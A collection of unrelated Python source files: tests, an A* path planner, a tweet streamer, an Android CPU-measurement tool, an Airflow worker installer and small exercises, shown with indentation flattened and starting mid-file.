skip = ['raw_fruct-002','raw_fruct-003','raw_fruct-006','raw_fruct-011','raw_fruct-012',
'raw_fruct-016','raw_fruct-017','raw_fruct-018','raw_fruct-020','raw_fruct-021','raw_fruct-023',
'raw_fruct-025','raw_fruct-026','raw_fruct-028','raw_fruct-035','raw_fruct-046',
'raw_fruct-047','raw_fruct-048','raw_fruct-055','raw_fruct-057','raw_fruct-059',
'raw_fruct-061','_archive_results_pass1','_archive_results_pass2']
# get all paths in data directory, remove unusable datasets, convert into filenames
paths = list(filter(os.path.isdir, [os.path.join(STARTDIR,f) for f in os.listdir(STARTDIR) if f not in skip]))
datafiles = [path+'_all_files.xml' for path in paths]
for i,datafile in enumerate(datafiles):
# Load Main Dataset --------------------------
fpath, fname = os.path.split(datafile)
if verbose: print("""%s - Load Data into a Dataset object - %s""" % (str(i), fname))
datasets, _ = _open_viff(datafile)
dataset = datasets[-1]
do_results( dataset, datafile, csvfile, verbose=verbose, debug=False)
# if i >= 3: break # debug statement to exit after one file processed
bob = 10
bob += 1
if __name__ == '__main__':
main()
|
# The MIT License
# Copyright (c) 2021- Nordic Institute for Interoperability Solutions (NIIS)
# Copyright (c) 2017-2020 Estonian Information System Authority (RIA)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import unittest
from unittest.mock import MagicMock, Mock
from opmon_anonymizer.anonymizer import Anonymizer
ROOT_DIR = os.path.abspath(os.path.dirname(__file__))
class TestAnonymizer(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.maxDiff = None
def test_allowed_fields_parsing(self):
allowed_fields = Anonymizer._get_allowed_fields(
os.path.join(ROOT_DIR, 'data', 'test_field_translations.list'),
Mock()
)
expected_allowed_fields = ['client.requestInTs', 'producer.requestInTs', 'client.securityServerType', 'totalDuration']
self.assertCountEqual(expected_allowed_fields, allowed_fields)
def test_hiding_rules_parsing(self):
self.assertTrue(True)
def test_hiding_rules_parsing(self):
self.assertTrue(True)
def test_substitution_rules_parsing(self):
self.assertTrue(True)
def test_transformers_parsing(self):
self.assertTrue(True)
def test_field_translation_parsing(self):
anonymizer_instance = Mock()
field_translations = Anonymizer._get_field_translations(
anonymizer_instance, os.path.join(ROOT_DIR, 'data', 'test_field_translations.list'))
expected_field_translations = {
'client': {
'requestInTs': 'requestInTs',
'securityServerType': 'securityServerType',
},
'producer': {
'requestInTs': 'requestInTs',
},
'totalDuration': 'totalDuration',
}
self.assertEqual(expected_field_translations, field_translations)
def test_field_value_mask_parsing(self):
anonymizer_instance = Mock()
field_agent_masks = Anonymizer._get_field_value_masks(
anonymizer_instance, os.path.join(ROOT_DIR, 'data', 'test_field_data.yaml'))
expected_field_agent_masks = {'client': set(['producerDurationProducerView']), 'producer': set(['totalDuration'])}
self.assertEqual(expected_field_agent_masks, field_agent_masks)
# def test_last_anonymization_timestamp_storing(self):
# new_sqlite_db_path = 'temp.db'
# previous_run_manager = PreviousRunManager(new_sqlite_db_path)
#
# current_time = datetime.datetime.now().timestamp()
# previous_run_manager.set_previous_run(current_time)
#
# fetched_time = previous_run_manager.get_previous_run()
#
# self.assertEqual(current_time, fetched_time)
#
# os.remove(new_sqlite_db_path)
|
from pymatflow.abinit.group import AbinitVariableGroup
class AbinitMisc(AbinitVariableGroup):
"""
"""
def __init__(self):
super().__init__()
#self.incharge = []
self.status = True
def to_string(self, n=0):
"""
:return input_str is the string of all the set params
"""
input_str = ""
input_str += "# ============================\n"
input_str += "# miscellaneous parameters\n"
input_str += "# ============================\n"
input_str += "\n"
self.set_n(n)
input_str += super().to_string()
return input_str
#
|
import unittest
import os.path
import sys
import numpy as np
root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(root_dir)
import dataset
# TO DO: Add data to lustre + gpfs for easier testing
class dataset_test(unittest.TestCase):
def test_num_train_samples(self):
#print("Testing num train samples")
self.assertEqual(dataset.num_train_samples(), 64)
def test_get_train(self):
#print("Testing get train")
for i in range(dataset.num_train_samples()):
mof = dataset.get_train(i)
self.assertIsInstance(mof, np.ndarray)
def test_sample_dims(self):
# print("Testing Sample Dims")
self.assertEqual(dataset.sample_dims()[0], dataset.get_train(0).size)
if __name__ == '__main__':
unittest.main()
|
"""
A* grid based planning
author: Atsushi Sakai(@Atsushi_twi)
Revised by Nikos Kanargias (nkana@tee.gr)
See Wikipedia article (https://en.wikipedia.org/wiki/A*_search_algorithm)
See also code of Christian Careaga (http://code.activestate.com/recipes/578919-python-a-pathfinding-with-binary-heap/)
"""
import matplotlib.pyplot as plt
import math
from operator import attrgetter
show_animation = True
class Node:
def __init__(self, x, y):
self.x = x
self.y = y
self.gscore = 0
self.fscore = 0
def __str__(self):
return str(self.x) + "," + str(self.y) + "," + str(self.fscore)
def __eq__(self, other):
"""
useful Cell equivalence
"""
if isinstance(other, self.__class__):
return self.x == other.x and self.y == other.y
else:
return False
def calc_final_path(nstart, ngoal, reso):
# generate final course
rx, ry = [ngoal.x * reso], [ngoal.y * reso]
current = ngoal
while current != nstart:
rx.append(current.x * reso)
ry.append(current.y * reso)
current = current.cameFrom
return rx, ry
def a_star_planning(sx, sy, gx, gy, ox, oy, reso, rr):
"""
gx: goal x position [m]
gx: goal x position [m]
ox: x position list of Obstacles [m]
oy: y position list of Obstacles [m]
reso: grid resolution [m]
rr: robot radius[m]
"""
nstart = Node(round(sx / reso), round(sy / reso))
ngoal = Node(round(gx / reso), round(gy / reso))
ox = [iox / reso for iox in ox]
oy = [ioy / reso for ioy in oy]
obmap, minx, miny, maxx, maxy, xw, yw = calc_obstacle_map(ox, oy, reso, rr)
motion = get_motion_model()
openset, closedset = [nstart], []
while openset:
openset.sort(key=attrgetter("fscore"))
# Remove the item with the smallest fscore value from the open set
current = openset.pop(0)
# show graph
if show_animation:
plt.plot(current.x * reso, current.y * reso, "xc")
if len(closedset) % 10 == 0:
plt.pause(0.001)
if current == ngoal:
print("Find goal")
ngoal.cameFrom = current.cameFrom
break
# Add it to the closed set
closedset.insert(0, current)
# expand search grid based on motion model
for i in range(len(motion)):
neighbor = Node(current.x + motion[i][0], current.y + motion[i][1])
# if tentative_g_score is eliminated we get the greedy algorithm instead
tentative_g_score = current.gscore + heuristic(current, neighbor)
if not verify_node(neighbor, obmap, minx, miny, maxx, maxy):
continue
if neighbor in closedset and tentative_g_score >= neighbor.gscore:
continue
if tentative_g_score < neighbor.gscore or neighbor not in openset:
neighbor.cameFrom = current
neighbor.gscore = tentative_g_score
neighbor.fscore = tentative_g_score + heuristic(neighbor, ngoal)
openset.append(neighbor)
rx, ry = calc_final_path(nstart, ngoal, reso)
return rx, ry
def heuristic(a, b):
w = 10.0 # weight of heuristic
d = w * math.sqrt((a.x - b.x)**2 + (a.y - b.y)**2)
return d
def verify_node(node, obmap, minx, miny, maxx, maxy):
if node.x < minx:
return False
elif node.y < miny:
return False
elif node.x >= maxx:
return False
elif node.y >= maxy:
return False
if obmap[node.x][node.y]:
return False
return True
def calc_obstacle_map(ox, oy, reso, vr):
minx = round(min(ox))
miny = round(min(oy))
maxx = round(max(ox))
maxy = round(max(oy))
# print("minx:", minx)
# print("miny:", miny)
# print("maxx:", maxx)
# print("maxy:", maxy)
xwidth = round(maxx - minx)
ywidth = round(maxy - miny)
# print("xwidth:", xwidth)
# print("ywidth:", ywidth)
# obstacle map generation
obmap = [[False for i in range(xwidth)] for i in range(ywidth)]
for ix in range(xwidth):
x = ix + minx
for iy in range(ywidth):
y = iy + miny
# print(x, y)
for iox, ioy in zip(ox, oy):
d = math.sqrt((iox - x)**2 + (ioy - y)**2)
if d <= vr / reso:
obmap[ix][iy] = True
break
return obmap, minx, miny, maxx, maxy, xwidth, ywidth
def get_motion_model():
# dx, dy, cost
motion = [[1, 0, 1],
[0, 1, 1],
[-1, 0, 1],
[0, -1, 1],
[-1, -1, math.sqrt(2)],
[-1, 1, math.sqrt(2)],
[1, -1, math.sqrt(2)],
[1, 1, math.sqrt(2)]]
return motion
def main():
print(__file__ + " start!!")
# start and goal position
sx = 10.0 # [m]
sy = 10.0 # [m]
gx = 50.0 # [m]
gy = 50.0 # [m]
grid_size = 1.0 # [m]
robot_size = 1.0 # [m]
ox, oy = [], []
for i in range(60):
ox.append(i)
oy.append(0.0)
for i in range(60):
ox.append(60.0)
oy.append(i)
for i in range(61):
ox.append(i)
oy.append(60.0)
for i in range(61):
ox.append(0.0)
oy.append(i)
for i in range(40):
ox.append(20.0)
oy.append(i)
for i in range(40):
ox.append(40.0)
oy.append(60.0 - i)
if show_animation:
plt.plot(ox, oy, ".k")
plt.plot(sx, sy, "xr")
plt.plot(gx, gy, "xb")
plt.grid(True)
plt.axis("equal")
rx, ry = a_star_planning(sx, sy, gx, gy, ox, oy, grid_size, robot_size)
if show_animation:
plt.plot(rx, ry, "-r")
plt.show()
if __name__ == '__main__':
main()
|
"""
stream tweets to database driver and stdout
"""
import logging
import signal
import sys
import tweepy
from urllib3.exceptions import ProtocolError
from tweepy.streaming import StreamListener
import config as c
import utils
class StdOutListener(StreamListener):
"""
listener, resposible for receiving data
"""
def __init__(self, database):
super(StdOutListener, self).__init__()
self.database = database
def on_status(self, status):
"""
a twitter status has been recieved
"""
tweet_url = (
"http://twitter.com/" + status.user.screen_name + "/status/" + status.id_str
)
logging.info(f"TWEET: {tweet_url}\n{status.text}")
self.database.saveTweet(tweet_url, status)
self.database.saveAuthor(status)
def on_error(self, status):
"""
error handler
"""
logging.error(status)
def run():
"""
main entry point
"""
opts = c.parse_args([c.CONFIG_FILE, c.DEBUG, c.IDS, c.USERS, c.DBS, c.TERMS])
database = opts.db
config = opts.config[0]
print (opts.ids)
if opts.ids:
ids = [str(i[1]) for i in opts.ids]
else:
ids = None
stream_config = {
"follow": ids,
"track": opts.track or None
}
listener = StdOutListener(database)
api = utils.twitter_login(config)
def signal_handler(*argv, **argh):
database.close()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
stream = tweepy.Stream(auth = api.auth, listener = listener)
logging.info(f"STREAM: {stream_config}")
while True:
try:
stream.filter(**stream_config)
except ProtocolError:
pass
if __name__ == "__main__":
run()
|
import ApplicationPerformance.applicationperformance.launchTime as launchTime # Mac系统
#import ApplicationPerformance.applicationperformance.launchTime as launchTime #windows 系统 引入applicationperformance.launchTime 模块重命名为launchTime
import ApplicationPerformance.applicationfunction.functionAutomation as functionAutomation
import os
import time
import platform
class CpuApplicationData(object):
# 判断当前系统
def receiveSystomInfo(self):
return platform.system()
# 执行CPU百分比命令
def receiveCpuDataCmd(self, searchkey, devicesid):
if "Windows" in CpuApplicationData().receiveSystomInfo(): # Windows系统
if devicesid != "":
receivecpucmd = "adb.exe -s %s shell dumpsys cpuinfo | find \"%s\"" % (devicesid, searchkey)
cpuproportion = 0
receivecpudata = os.popen(receivecpucmd)
cpudatas = [i for i in receivecpudata]
while "\n" in cpudatas:
cpudatas.remove("\n")
for cpuproportiondatas in cpudatas:
cpuproportiondata = float(cpuproportiondatas.split('%')[0])
cpuproportion = cpuproportion + cpuproportiondata
return str(cpuproportion) + '%'
else:
receivecpucmd = "adb.exe shell dumpsys cpuinfo | find \"%s\"" % (searchkey)
cpuproportion = 0
receivecpudata = os.popen(receivecpucmd)
cpudatas = [i for i in receivecpudata]
while "\n" in cpudatas:
cpudatas.remove("\n")
for cpuproportiondatas in cpudatas:
cpuproportiondata = float(cpuproportiondatas.split('%')[0])
cpuproportion = cpuproportion + cpuproportiondata
return str(cpuproportion) + '%'
elif "Darwin" in CpuApplicationData().receiveSystomInfo(): # Mac系统
if devicesid != "":
receivecpucmd = "adb -s %s shell dumpsys cpuinfo | grep %s" % (devicesid, searchkey)
cpuproportion = 0
receivecpudata = os.popen(receivecpucmd)
cpudatas = [i for i in receivecpudata]
for cpuproportiondatas in cpudatas:
cpuproportiondata = float(cpuproportiondatas.split('%')[0])
cpuproportion = cpuproportion + cpuproportiondata
return str(cpuproportion) + '%'
else:
receivecpucmd = "adb shell dumpsys cpuinfo | grep %s" % (searchkey)
cpuproportion = 0
receivecpudata = os.popen(receivecpucmd)
cpudatas = [i for i in receivecpudata]
for cpuproportiondatas in cpudatas:
cpuproportiondata = float(cpuproportiondatas.split('%')[0])
cpuproportion = cpuproportion + cpuproportiondata
return str(cpuproportion) + '%'
else:
print("当前系统环境无法识别,请使用Mac或Windows系统")
# 执行monkey脚本
def monkeyRun(self, monkeyscript):
monkeycmd = os.popen(monkeyscript)
# 停止运行monkey
def Stopmonkey(self, devicesid):
if "Windows" in CpuApplicationData().receiveSystomInfo(): # Windows系统
if devicesid != "":
executecmd = [i for i in os.popen("adb -s %s shell ps | find \"monkey\"" % (devicesid))]
while "\n" in executecmd:
executecmd.remove("\n")
stopmonkeycmd = executecmd[0].split()[1]
os.popen("adb -s %s shell kill -9 %s" % (devicesid, stopmonkeycmd))
else:
executecmd = [i for i in os.popen("adb shell ps | find \"monkey\"")]
while "\n" in executecmd:
executecmd.remove("\n")
stopmonkeycmd = executecmd[0].split()[1]
os.popen("adb shell kill -9 %s" % (stopmonkeycmd))
elif "Darwin" in CpuApplicationData().receiveSystomInfo(): # Mac系统
if devicesid != "":
for i in os.popen("adb -s %s shell ps | grep monkey" % (devicesid)):
stopmonkeycmd = i.split()[1]
os.popen("adb -s %s shell kill -9 %s" % (devicesid, stopmonkeycmd))
else:
for i in os.popen("adb shell ps | grep monkey"):
stopmonkeycmd = i.split()[1]
os.popen("adb shell kill -9 %s" % (stopmonkeycmd))
else:
if devicesid != "":
for i in os.popen("adb -s %s shell ps | grep monkey" % (devicesid)):
stopmonkeycmd = i.split()[1]
os.popen("adb -s %s shell kill -9 %s" % (devicesid, stopmonkeycmd))
else:
for i in os.popen("adb shell ps | grep monkey"):
stopmonkeycmd = i.split()[1]
os.popen("adb shell kill -9 %s" % (stopmonkeycmd))
# 获取CPU数据且保存数据
def receiveCpuData(self):
caserows = launchTime.ReadExcel().readeExcelData('cpudata')
eventid = time.strftime('%Y%m%d%H%M%S', time.localtime())
for i in range(1, caserows.get('caserows')):
casedata = caserows.get('excledata_sheel').row_values(i)
caseid = int(casedata[0])
packactivity = casedata[1]
packname = casedata[2]
searchkey = casedata[3]
if searchkey == "":
print("执行命令的搜索字为空,请检查excel表格D1列")
monkeyscript = casedata[4]
functionscript = casedata[5]
count = int(casedata[6])
intervaltime = int(casedata[7])
devicesid = casedata[8]
executestatus = casedata[9]
returndata = caseid, packname, monkeyscript, functionscript, count, intervaltime, devicesid, executestatus
if 'Y' in executestatus:
if count > 0:
print("执行用例编号:%s,用例数据为:%s" % (caseid, returndata))
if monkeyscript != "":
runnumber = 1
CpuApplicationData().monkeyRun(monkeyscript) # 运行monkey脚本
cpuproportions = "" # 统计执行monkey时,获取CPU值。
while count > 0:
startruntime = time.time()
cpuproportion = CpuApplicationData().receiveCpuDataCmd(searchkey, devicesid)
cpuproportions = cpuproportions + cpuproportion + ","
endruntime = time.time()
runtime = int(str(endruntime - startruntime).split(".")[1][0:4])
runtimes = endruntime - startruntime
time.sleep(intervaltime)
count -= 1
print("用例编号:%s,第%s次执行,执行时间为:%s ms,执行结果为:%s" % (caseid, runnumber, runtime, cpuproportion))
runnumber += 1
if cpuproportions.endswith(','): # 处理cpuproportions字符串,把结尾的逗号去掉
cpuproportions = cpuproportions.rstrip(',')
savedata = "insert into automationquery_automation_cpu_app (`cpuproportion`,`starttime`,`endtime`,`monkeyscript`,`functionscript`,`createdtime`,`updatetime`,`caseid`,`runtime`,`eventid`)VALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (
cpuproportions, startruntime, endruntime, monkeyscript, functionscript,
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), caseid, runtimes, eventid)
launchTime.MysqlConnect().saveDatatoMysql("%s" % (savedata))
CpuApplicationData().Stopmonkey(devicesid) # 停止monkey脚本
elif functionscript != "":
functionAutomation.FunctionAutomation().runTestCase("open") # 执行自动化测试用例
runnumber = 1
while count > 0:
startruntime = time.time()
cpuproportion = CpuApplicationData().receiveCpuDataCmd(searchkey, devicesid)
endruntime = time.time()
runtime = int(str(endruntime - startruntime).split(".")[1][0:4])
runtimes = endruntime - startruntime
savedata = "insert into automationquery_automation_cpu_app (`cpuproportion`,`starttime`,`endtime`,`monkeyscript`,`functionscript`,`createdtime`,`updatetime`,`caseid`,`runtime`,`eventid`)VALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (
cpuproportion, startruntime, endruntime, monkeyscript, functionscript,
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), caseid, runtimes, eventid)
launchTime.MysqlConnect().saveDatatoMysql("%s" % (savedata))
print("用例编号:%s,第%s次执行,执行时间为:%s ms,执行结果为:%s" % (caseid, runnumber, runtime, cpuproportion))
time.sleep(intervaltime)
count -= 1
runnumber += 1
else:
launchTime.LaunchApplication().coolLaunch(packactivity, devicesid)
runnumber = 1
while count > 0:
startruntime = time.time()
cpuproportion = CpuApplicationData().receiveCpuDataCmd(searchkey, devicesid)
endruntime = time.time()
runtime = int(str(endruntime - startruntime).split(".")[1][0:4])
runtimes = endruntime - startruntime
savedata = "insert into automationquery_automation_cpu_app (`cpuproportion`,`starttime`,`endtime`,`monkeyscript`,`functionscript`,`createdtime`,`updatetime`,`caseid`,`runtime`,`eventid`)VALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (
cpuproportion, startruntime, endruntime, monkeyscript, functionscript,
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), caseid, runtimes, eventid)
launchTime.MysqlConnect().saveDatatoMysql("%s" % (savedata))
print("用例编号:%s,第%s次执行,执行时间为:%s ms,执行结果为:%s" % (caseid, runnumber, runtime, cpuproportion))
time.sleep(intervaltime)
count -= 1
runnumber += 1
else:
print("用例编号:%s,该用例执行次数为0,则不执行,用例数据为:%s" % (caseid, returndata))
elif 'N' in executestatus:
print("用例编号:%s,该用例执行状态为NO,则不执行,用例数据为:%s" % (caseid, returndata))
else:
print("用例编号:%s,该用例未执行,请检查该用例状态是否为Yes或No.用例数据为:%s" % (caseid, returndata))
if __name__ == "__main__":
CpuApplicationData().receiveCpuData()
|
from typing import List, Optional
from sqlalchemy import UniqueConstraint
from sqlalchemy.orm import relationship
from sqlmodel import Field, Relationship, SQLModel
from sb_backend.app.models.base.base_model import TimeStampMixin
class NoSeriesBase(SQLModel):
"""«No. Series» («Серия Номеров»)"""
code: str = Field(max_length=20, nullable=False, default="")
description: str = Field(max_length=100)
date_order: bool = False
noserieslines: List["NoSeriesLine"] = Relationship(
sa_relationship_kwargs=relationship(
"NoSeriesLine", cascade="all, delete, delete-orphan", back_populates="series_no", passive_deletes=True
),
)
noseriessetup: List["NoSeriesSetup"] = Relationship(back_populates="setup_series_no")
class NoSeries(NoSeriesBase, TimeStampMixin, table=True):
"""«No. Series» («Серия Номеров»)"""
__tablename__ = "no_series"
__table_args__ = (UniqueConstraint("code"),)
id: Optional[int] = Field(default=None, primary_key=True)
def __repr__(self):
return f'<NoSeries({self.code})>'
class NoSeriesCreate(NoSeriesBase):
"""«No. Series» («Серия Номеров»)"""
code: str
class NoSeriesRead(NoSeriesBase):
"""«No. Series» («Серия Номеров»)"""
id: int
# noserieslines: Optional[NoSeriesLine]
class NoSeriesUpdate(SQLModel):
"""«No. Series» («Серия Номеров»)"""
code: str
description: Optional[str]
date_order: Optional[bool] = False
|
from .controller import Controller # noqa: F401
|
# Crear una funcion que permita ingresar al usuario
# Numero enteros... y strings...
# 1- print -> imprime la lista que su fue cargando hasta el momento...
# 2- append a -> siendo a numero entero
# 3- remove b -> siendo b numero entero
# 4- sort
# 5- reverse
# 6- insert c d -> siendo ambos numeros enteros c le indice y d el valor
# 7- exit -> termina el programa
isRunning = True
myList = []
while isRunning:
userInput = input("Ingrese comando: ")
command = userInput.split()
if command[0] == "exit":
isRunning = False
elif command[0] == "append":
# Quizas debamos hacer un chequeo del input
argumentos = command[1]
if argumentos.isdigit():
myList.append(int(argumentos))
elif command[0] == "print":
print(myList)
elif command[0] == "sort":
myList.sort()
elif command[0] == "insert":
myList.insert(int(command[1]),int(command[2]))
#print("Se agrego",command[2],"en el indice",command[1])
# En Javascript teniamos las arrow functions que eran anonimas
#myFuncion = (x) => x**2
myFuncion = lambda x: x**2
|
#!/usr/bin/env python
# Find the sum of all the numbers that can be written
# as the sum of fifth powers of their digits.
# n = d-digits, sum(n) <= d*9^5 = 59049d, n >= 10^(d-1),
# so sum(n) = n implies 10*(9**5 d) >= 10**d,
# ln(10 * 9**5) + ln(d) >= d ln(10), so d <= 6
from python.decorators import euler_timer
def sum_of_digits_powers(n, power):
return sum(int(dig) ** power for dig in str(n))
def main(verbose=False):
valid = [i for i in xrange(2, 999999 + 1)
if sum_of_digits_powers(i, 5) == i]
if verbose:
return '%s.\nThe numbers satisfying this property are: %s.' % (
sum(valid), ', '.join(str(num) for num in valid))
else:
return sum(valid)
if __name__ == '__main__':
print euler_timer(30)(main)(verbose=True)
|
"""
ImagePredictor
Image predictor abstract class
"""
class ImagePredictor(object):
""" Class that gives abstract definition of a prediction engine.
Can be used to extend to your own local ML implementation or another API.
"""
def get_prediction(self, image):
raise NotImplementedError()
|
import numpy as np
n,m = map(int,input().strip().split())
arr = np.ndarray(shape=(n,m),dtype=np.int32)
for i in range(n):
row = list(map(int,input().strip().split()))
arr[i,:] = row
trans = np.transpose(arr)
flat = arr.flatten()
print(trans)
print(flat)
|
import math
import unittest
from hummingbot.client.performance_analysis import PerformanceAnalysis
class TestPerformanceAnalysis(unittest.TestCase):
def test_basic_one_ex(self):
""" Test performance analysis on a one exchange balance. """
performance_analysis = PerformanceAnalysis()
performance_analysis.add_balances("WETH", 0.5, True, True)
performance_analysis.add_balances("DAI", 60, False, True)
performance_analysis.add_balances("WETH", 0.4, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
calculated_percent = performance_analysis.compute_profitability(50)
expected_percent = (((0.4 * 50) + 70)/((0.5 * 50) + 60) - 1) * 100
self.assertEqual(calculated_percent, expected_percent, "Basic one ex test failed.")
def test_basic_two_ex(self):
""" Test performance analysis on a two exchange balance with the same currencies trading in both exchanges. """
performance_analysis = PerformanceAnalysis()
performance_analysis.add_balances("WETH", 0.5, True, True)
performance_analysis.add_balances("DAI", 60, False, True)
performance_analysis.add_balances("WETH", 0.7, True, True)
performance_analysis.add_balances("DAI", 50, False, True)
performance_analysis.add_balances("WETH", 0.4, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
performance_analysis.add_balances("WETH", 0.3, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
calculated_percent = performance_analysis.compute_profitability(50)
expected_percent = (((0.7 * 50) + 140)/((1.2 * 50) + 110) - 1) * 100
self.assertEqual(calculated_percent, expected_percent, "Basic one ex test failed.")
def test_different_tokens_two_ex(self):
""" Test performance analysis on a two exchange balance with different currencies trading. Note that this test
will not work as the config file that contains the conversion has not been loaded."""
performance_analysis = PerformanceAnalysis()
performance_analysis.add_balances("WETH", 0.5, True, True)
performance_analysis.add_balances("DAI", 60, False, True)
performance_analysis.add_balances("ETH", 0.7, True, True)
performance_analysis.add_balances("USD", 50, False, True)
performance_analysis.add_balances("WETH", 0.4, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
performance_analysis.add_balances("ETH", 0.3, True, False)
performance_analysis.add_balances("USD", 70, False, False)
calculated_percent = performance_analysis.compute_profitability(50)
expected_percent = (((0.7 * 50) + 140)/((1.2 * 50) + 110) - 1) * 100
self.assertAlmostEquals(calculated_percent, expected_percent, msg="Two diff token test failed.", delta=0.1)
def test_nan_starting(self):
""" Test the case where the starting balance is 0. """
performance_analysis = PerformanceAnalysis()
performance_analysis.add_balances("WETH", 0, True, True)
performance_analysis.add_balances("DAI", 0, False, True)
performance_analysis.add_balances("WETH", 0.3, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
calculated_percent = performance_analysis.compute_profitability(50)
self.assertTrue(math.isnan(calculated_percent), "Starting value of 0 test failed.")
if __name__ == "__main__":
unittest.main()
|
#!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from test import patch
from test import Mock
from diamond.collector import Collector
from nvidia_gpu import NvidiaGPUCollector
##########################################################################
class TestNvidiaGPUCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('NvidiaGPUCollector', {
})
self.collector = NvidiaGPUCollector(config, None)
def test_import(self):
self.assertTrue(NvidiaGPUCollector)
@patch.object(Collector, 'publish')
def test_should_publish_gpu_stat(self, publish_mock):
output_mock = Mock(
return_value=(self.getFixture('nvidia_smi').getvalue(), '')
)
collector_mock = patch.object(
NvidiaGPUCollector,
'run_command',
output_mock
)
collector_mock.start()
self.collector.collect()
collector_mock.stop()
metrics = {
'gpu_0.memory.total': 4095,
'gpu_0.memory.used': 2670,
'gpu_0.memory.free': 1425,
'gpu_0.utilization.gpu': 0,
'gpu_0.utilization.memory': 0,
'gpu_0.temperature.gpu': 53,
'gpu_1.memory.total': 4095,
'gpu_1.memory.used': 2670,
'gpu_1.memory.free': 1425,
'gpu_1.utilization.gpu': 0,
'gpu_1.utilization.memory': 0,
'gpu_1.temperature.gpu': 44,
'gpu_2.memory.total': 4095,
'gpu_2.memory.used': 1437,
'gpu_2.memory.free': 2658,
'gpu_2.utilization.gpu': 0,
'gpu_2.utilization.memory': 0,
'gpu_2.temperature.gpu': 48,
'gpu_3.memory.total': 4095,
'gpu_3.memory.used': 1437,
'gpu_3.memory.free': 2658,
'gpu_3.utilization.gpu': 0,
'gpu_3.utilization.memory': 0,
'gpu_3.temperature.gpu': 44
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
##########################################################################
if __name__ == "__main__":
unittest.main()
|
import sys, os, pwd, grp, signal, time
from resource_management import *
from subprocess import call
from airflow_setup import *
class AirflowWorker(Script):
"""
Contains the interface definitions for methods like install,
start, stop, status, etc. for the Airflow Server
"""
def install(self, env):
import params
env.set_params(params)
self.install_packages(env)
Logger.info(format("Installing Airflow Service"))
# virtualevn setting ------------------------------------------
Execute(format("python3 /datalabnas/hadoop3/get-pip.py"))
Execute(format("pip3 install --upgrade configparser"))
Execute(format("pip3 install virtualenv"))
Execute(format("virtualenv {airflow_home}/airflow_env --python=python3"))
# -------------------------------------------------------------
Execute(format("export SLUGIFY_USES_TEXT_UNIDECODE=yes && {airflow_home}/airflow_env/bin/pip install --upgrade {airflow_pip_params} apache-airflow[all]==1.10.10 --constraint https://raw.githubusercontent.com/apache/airflow/1.10.10/requirements/requirements-python3.6.txt"))
Execute(format("export SLUGIFY_USES_TEXT_UNIDECODE=yes && {airflow_home}/airflow_env/bin/pip install --upgrade {airflow_pip_params} apache-airflow[celery]==1.10.10 --constraint https://raw.githubusercontent.com/apache/airflow/1.10.10/requirements/requirements-python3.6.txt"))
Execute(format("chmod 755 {airflow_home}/airflow_env/bin/airflow"))
Execute(format("useradd {airflow_user}"), ignore_failures=True)
Execute(format("mkdir -p {airflow_home}"))
airflow_make_startup_script(env)
Execute(format("chown -R {airflow_user}:{airflow_group} {airflow_home}"))
Execute(format("export AIRFLOW_HOME={airflow_home} && {airflow_home}/airflow_env/bin/airflow initdb"),
user=params.airflow_user
)
def configure(self, env):
import params
env.set_params(params)
airflow_configure(env)
airflow_make_systemd_scripts_worker(env)
def start(self, env):
import params
self.configure(env)
Execute("service airflow-worker start")
time.sleep(10)
Execute('ps -ef | grep "airflow serve_logs" | grep -v grep | awk \'{print $2}\' > ' + params.airflow_worker_pid_file,
user=params.airflow_user
)
def stop(self, env):
import params
env.set_params(params)
# Kill the process of Airflow
Execute("service airflow-worker stop")
File(params.airflow_worker_pid_file,
action = "delete"
)
def status(self, env):
import status_params
env.set_params(status_params)
#use built-in method to check status using pidfile
check_process_status(status_params.airflow_worker_pid_file)
if __name__ == "__main__":
AirflowWorker().execute()
|
from MDRSREID.Loss_Meter import Loss
import torch.nn as nn
import torch
from MDRSREID.utils.meter import RecentAverageMeter as Meter
class IDLoss(Loss):
def __init__(self, cfg, tb_writer=None):
super(IDLoss, self).__init__(cfg, tb_writer=tb_writer)
self.criterion = nn.CrossEntropyLoss(reduction='none') # 'none' | 'mean' | 'sum'.
self.part_fmt = '#{}'
def __call__(self, item, pred, step=0, **kwargs):
loss_list = [self.criterion(logits, item['label']).mean() for logits in pred['cls_feat_list']]
# New version of pytorch allow stacking 0-dim tensors, but not concatenating.
loss = torch.stack(loss_list).mean() # sum()
# Meter: stores and computes the average of recent values
self.store_calculate_loss(loss)
